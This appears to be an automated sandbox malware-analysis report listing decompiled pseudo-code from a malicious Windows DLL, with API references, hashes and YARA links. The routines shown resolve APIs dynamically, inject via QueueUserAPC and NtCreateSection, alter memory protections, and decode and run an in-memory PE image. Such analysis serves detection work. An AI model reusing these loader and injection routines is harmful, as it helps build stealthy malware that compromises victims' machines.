                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F03153C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6f0341c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                            0x6f031553
                                                                                                            0x6f031559
                                                                                                            0x6f03155d
                                                                                                            0x6f031568
                                                                                                            0x6f031570
                                                                                                            0x6f031579
                                                                                                            0x6f03157d
                                                                                                            0x6f031584
                                                                                                            0x6f03158b
                                                                                                            0x6f03158d
                                                                                                            0x6f031593
                                                                                                            0x6f031570
                                                                                                            0x6f031597

                                                                                                            APIs
                                                                                                            • CreateThread.KERNELBASE ref: 6F031553
                                                                                                            • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F031568
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 6F031573
                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 6F03157D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6F031584
                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6F03158D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 3832013932-1084903527
                                                                                                            • Opcode ID: c33f5a5c0a65e329fe4803572d26b687d4372741a62974b78e40391c498aaa88
                                                                                                            • Instruction ID: ad48bd9f519df07a0fdf1cdde04f665d30b2f92de2129def7019ff0cc4164034
                                                                                                            • Opcode Fuzzy Hash: c33f5a5c0a65e329fe4803572d26b687d4372741a62974b78e40391c498aaa88
                                                                                                            • Instruction Fuzzy Hash: EFF01237605E22FBDB315BA09D9AF9BBFA9FF0E772F000504F60595150C7259820AB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0319C2, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0319C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6F031000(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6f0341c4 + 0x6f035014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6F031397(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f035189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6f0341c4 + 0x6f03519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6F0313B8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                            0x6f0319d0
                                                                                                            0x6f0319d4
                                                                                                            0x6f031a95
                                                                                                            0x6f0319da
                                                                                                            0x6f0319f2
                                                                                                            0x6f031a01
                                                                                                            0x6f031a08
                                                                                                            0x6f031a0a
                                                                                                            0x6f031a0f
                                                                                                            0x6f031a8d
                                                                                                            0x6f031a8e
                                                                                                            0x6f031a11
                                                                                                            0x6f031a1e
                                                                                                            0x6f031a20
                                                                                                            0x6f031a25
                                                                                                            0x00000000
                                                                                                            0x6f031a27
                                                                                                            0x6f031a34
                                                                                                            0x6f031a36
                                                                                                            0x6f031a3b
                                                                                                            0x00000000
                                                                                                            0x6f031a3d
                                                                                                            0x6f031a4a
                                                                                                            0x6f031a4c
                                                                                                            0x6f031a51
                                                                                                            0x00000000
                                                                                                            0x6f031a53
                                                                                                            0x6f031a60
                                                                                                            0x6f031a62
                                                                                                            0x6f031a67
                                                                                                            0x00000000
                                                                                                            0x6f031a69
                                                                                                            0x6f031a6f
                                                                                                            0x6f031a75
                                                                                                            0x6f031a7a
                                                                                                            0x6f031a7f
                                                                                                            0x6f031a84
                                                                                                            0x00000000
                                                                                                            0x6f031a86
                                                                                                            0x6f031a89
                                                                                                            0x6f031a89
                                                                                                            0x6f031a84
                                                                                                            0x6f031a67
                                                                                                            0x6f031a51
                                                                                                            0x6f031a3b
                                                                                                            0x6f031a25
                                                                                                            0x6f031a0f
                                                                                                            0x6f031aa3

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6F031051,?,?,?,?), ref: 6F0319E6
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A08
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A1E
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A34
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A4A
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A60
                                                                                                              • Part of subcall function 6F0313B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 6F031415
                                                                                                              • Part of subcall function 6F0313B8: memset.NTDLL ref: 6F031437
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1632424568-0
                                                                                                            • Opcode ID: ee4442e368b9def4b294c75962c071ad4d75d69f4acbc33b68e357789b401b00
                                                                                                            • Instruction ID: cb66a763e637dda73a224119b9a19d0cc2877153e4d9a7cacb0250f8009bf1e4
                                                                                                            • Opcode Fuzzy Hash: ee4442e368b9def4b294c75962c071ad4d75d69f4acbc33b68e357789b401b00
                                                                                                            • Instruction Fuzzy Hash: 18213D77A00F1BAFDB11DF69CD80E6ABBECFF0A2107004566E515CB251E771E9049BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0312B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E6F0312B5(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6f0341c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                            0x6f0312bf
                                                                                                            0x6f0312cc
                                                                                                            0x6f0312d2
                                                                                                            0x6f0312de
                                                                                                            0x6f0312ee
                                                                                                            0x6f0312f0
                                                                                                            0x6f0312f8
                                                                                                            0x6f03138d
                                                                                                            0x6f031394
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0312fe
                                                                                                            0x6f0312fe
                                                                                                            0x6f0312fe
                                                                                                            0x6f031302
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03130e
                                                                                                            0x6f031312
                                                                                                            0x6f031336
                                                                                                            0x6f03133a
                                                                                                            0x6f03134e
                                                                                                            0x6f03134e
                                                                                                            0x6f031354
                                                                                                            0x6f031363
                                                                                                            0x6f031367
                                                                                                            0x6f03136f
                                                                                                            0x6f03136f
                                                                                                            0x6f031377
                                                                                                            0x6f03137a
                                                                                                            0x6f031387
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031387
                                                                                                            0x6f031342
                                                                                                            0x6f031346
                                                                                                            0x6f03134c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03134c
                                                                                                            0x6f03131a
                                                                                                            0x6f03131e
                                                                                                            0x6f031328
                                                                                                            0x6f031320
                                                                                                            0x6f031320
                                                                                                            0x6f031320
                                                                                                            0x00000000
                                                                                                            0x6f03131e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6F0312EE
                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6F031363
                                                                                                            • GetLastError.KERNEL32 ref: 6F031369
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual$ErrorLast
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 1469625949-1084903527
                                                                                                            • Opcode ID: 9c92e17244bb6aa7f12a1114502c9799d97a43a4fb5faf7ddde105bea1697c18
                                                                                                            • Instruction ID: fb8928282be416338655db6657d4b1c020d2a597a84457a02d8da99f42f2e4c4
                                                                                                            • Opcode Fuzzy Hash: 9c92e17244bb6aa7f12a1114502c9799d97a43a4fb5faf7ddde105bea1697c18
                                                                                                            • Instruction Fuzzy Hash: CD212772D0021AEFCB18CB95C985AAAF7F4EF0C355F414459E502D7408E7B4A668CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04C1E0, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1543COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            • Opcode ID: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction ID: 145c3df08cd0ec8d591a1cf2ed114b003f68e25b2a4aeac651a5d9991316f75b
                                                                                                            • Opcode Fuzzy Hash: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction Fuzzy Hash: C4035E71904952CECB08CF69CE907787FF2FB57325B24816ADD458728BE33955A8EB08
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F03189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E6F03189E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6f0341b0;
				_t46 = E6F032016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6f0341c0;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6f0351a7; // 0x6f0351a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6F031AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6f0341c0 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                                                                            0x6f0318a5
                                                                                                            0x6f0318b5
                                                                                                            0x6f0318ba
                                                                                                            0x6f0318bf
                                                                                                            0x6f0318d4
                                                                                                            0x6f0318db
                                                                                                            0x6f0318e0
                                                                                                            0x6f0318f1
                                                                                                            0x6f0318f4
                                                                                                            0x6f0318fa
                                                                                                            0x6f0318ff
                                                                                                            0x6f0319b2
                                                                                                            0x6f031905
                                                                                                            0x6f031905
                                                                                                            0x6f03190b
                                                                                                            0x6f03197a
                                                                                                            0x6f03190d
                                                                                                            0x6f03190d
                                                                                                            0x6f031910
                                                                                                            0x6f031912
                                                                                                            0x6f03191a
                                                                                                            0x6f03191d
                                                                                                            0x6f031920
                                                                                                            0x6f031928
                                                                                                            0x6f031933
                                                                                                            0x6f031934
                                                                                                            0x6f031935
                                                                                                            0x6f031952
                                                                                                            0x6f031960
                                                                                                            0x6f031967
                                                                                                            0x6f03196a
                                                                                                            0x6f03196d
                                                                                                            0x6f031975
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031925
                                                                                                            0x6f031925
                                                                                                            0x6f031977
                                                                                                            0x6f031984
                                                                                                            0x6f031999
                                                                                                            0x6f031986
                                                                                                            0x6f03198f
                                                                                                            0x6f031994
                                                                                                            0x6f0319aa
                                                                                                            0x6f0319aa
                                                                                                            0x6f0319b9
                                                                                                            0x6f0319bf

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,747863F0,00003000,00000004,00000030,00000000,747863F0,00000000,?,?,?,?,?,?,6F03163B,00000000), ref: 6F0318F4
                                                                                                            • memcpy.NTDLL(?,6F03163B,747863F0,?,?,?,?,?,?,6F03163B,00000000,00000030,747863F0,00000000), ref: 6F03198F
                                                                                                            • VirtualFree.KERNELBASE(6F03163B,00000000,00008000,?,?,?,?,?,?,6F03163B,00000000), ref: 6F0319AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFreememcpy
                                                                                                            • String ID: Sep 18 2021
                                                                                                            • API String ID: 4010158826-1373364653
                                                                                                            • Opcode ID: 98ec96ca8c6cb688d975631c89abba90633d056419f2e2505848caab108394c4
                                                                                                            • Instruction ID: 81f333260339334a22d6e79c43e6b1ac08492f2b275f020167e31f3df806a18b
                                                                                                            • Opcode Fuzzy Hash: 98ec96ca8c6cb688d975631c89abba90633d056419f2e2505848caab108394c4
                                                                                                            • Instruction Fuzzy Hash: 65313376D0061AEFDB01CF98D991BEEB7B8FF09308F104159E905BB285D775AA05CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031719, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E6F031719(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6F0315C6(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                            0x6f031722
                                                                                                            0x6f031727
                                                                                                            0x6f031735
                                                                                                            0x6f03173a
                                                                                                            0x6f03173a
                                                                                                            0x6f031740
                                                                                                            0x6f031745
                                                                                                            0x6f031749
                                                                                                            0x6f03174d
                                                                                                            0x6f03174d
                                                                                                            0x6f031757
                                                                                                            0x6f031760

                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 6F03171C
                                                                                                            • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6F031727
                                                                                                            • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6F03173A
                                                                                                            • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6F03174D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452675757-0
                                                                                                            • Opcode ID: 135c59c5e43f27b67bc29228f80b32c41af398c95e80fa409c6d08158a76a339
                                                                                                            • Instruction ID: 54b70ab939c1ed9d5fbf29c917032a51289de12aca2919b1f73e38d18381c992
                                                                                                            • Opcode Fuzzy Hash: 135c59c5e43f27b67bc29228f80b32c41af398c95e80fa409c6d08158a76a339
                                                                                                            • Instruction Fuzzy Hash: 3DE09237B06B236BA7212A294CD5F6B7BACEF9A3317010236F520962D0DB509C1295A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031015, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E6F031015(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6f0341c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45);
				_t18 = E6F0319C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6F031798(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6F031DE5(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6F0312B5(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6F031397(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                            0x6f03101d
                                                                                                            0x6f03101f
                                                                                                            0x6f03103b
                                                                                                            0x6f03104c
                                                                                                            0x6f031053
                                                                                                            0x6f0310b1
                                                                                                            0x00000000
                                                                                                            0x6f031055
                                                                                                            0x6f031055
                                                                                                            0x6f03105f
                                                                                                            0x6f031063
                                                                                                            0x6f031068
                                                                                                            0x6f03106b
                                                                                                            0x6f031070
                                                                                                            0x6f031074
                                                                                                            0x6f031079
                                                                                                            0x6f03107e
                                                                                                            0x6f031082
                                                                                                            0x6f031087
                                                                                                            0x6f031088
                                                                                                            0x6f03108c
                                                                                                            0x6f031091
                                                                                                            0x6f031099
                                                                                                            0x6f031099
                                                                                                            0x6f031091
                                                                                                            0x6f031082
                                                                                                            0x6f031074
                                                                                                            0x6f03109b
                                                                                                            0x6f0310a4
                                                                                                            0x6f0310a8
                                                                                                            0x6f0310b2
                                                                                                            0x6f0310b8
                                                                                                            0x6f0310b8

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0319C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6F031051,?,?,?,?), ref: 6F0319E6
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A08
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A1E
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A34
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A4A
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A60
                                                                                                              • Part of subcall function 6F031798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6F03105F,?,?,?,?,?,?), ref: 6F0317CF
                                                                                                              • Part of subcall function 6F031798: memcpy.NTDLL(?,?,?), ref: 6F031804
                                                                                                              • Part of subcall function 6F031DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6F031E1D
                                                                                                              • Part of subcall function 6F0312B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6F0312EE
                                                                                                              • Part of subcall function 6F0312B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6F031363
                                                                                                              • Part of subcall function 6F0312B5: GetLastError.KERNEL32 ref: 6F031369
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?), ref: 6F031093
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 2673762927-1084903527
                                                                                                            • Opcode ID: 858a5834252a445da9b88b1e4f58237f263144bb4cfb8704a5e445ceaf7b4f75
                                                                                                            • Instruction ID: b43391c958993934d1fc6cbb2d8acff62ae3d9eeed88d1b9ae1787b4bb155a65
                                                                                                            • Opcode Fuzzy Hash: 858a5834252a445da9b88b1e4f58237f263144bb4cfb8704a5e445ceaf7b4f75
                                                                                                            • Instruction Fuzzy Hash: 42110B37E007236BC3219AA58C94FAF77FCAF8D3147004519EA029B541DBA1FD054790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0310B9, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0310B9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6f0341c4;
				if( *0x6f0341ac > 5) {
					_t16 = _t15 + 0x6f0350f9;
				} else {
					_t16 = _t15 + 0x6f0350b1;
				}
				E6F0315A0(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6F031EF0( &_v32,  &_v16,  *0x6f0341c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6f0341b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6F031172(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6f0341b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6F032070(_t44, _t32 + 4);
						}
					}
					_t25 = E6F031015(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                            0x6f0310bf
                                                                                                            0x6f0310d0
                                                                                                            0x6f0310da
                                                                                                            0x6f0310d2
                                                                                                            0x6f0310d2
                                                                                                            0x6f0310d2
                                                                                                            0x6f0310e1
                                                                                                            0x6f0310ea
                                                                                                            0x6f0310ef
                                                                                                            0x6f03110d
                                                                                                            0x6f031169
                                                                                                            0x6f03110f
                                                                                                            0x6f031115
                                                                                                            0x6f03111b
                                                                                                            0x6f031129
                                                                                                            0x6f03112d
                                                                                                            0x6f031134
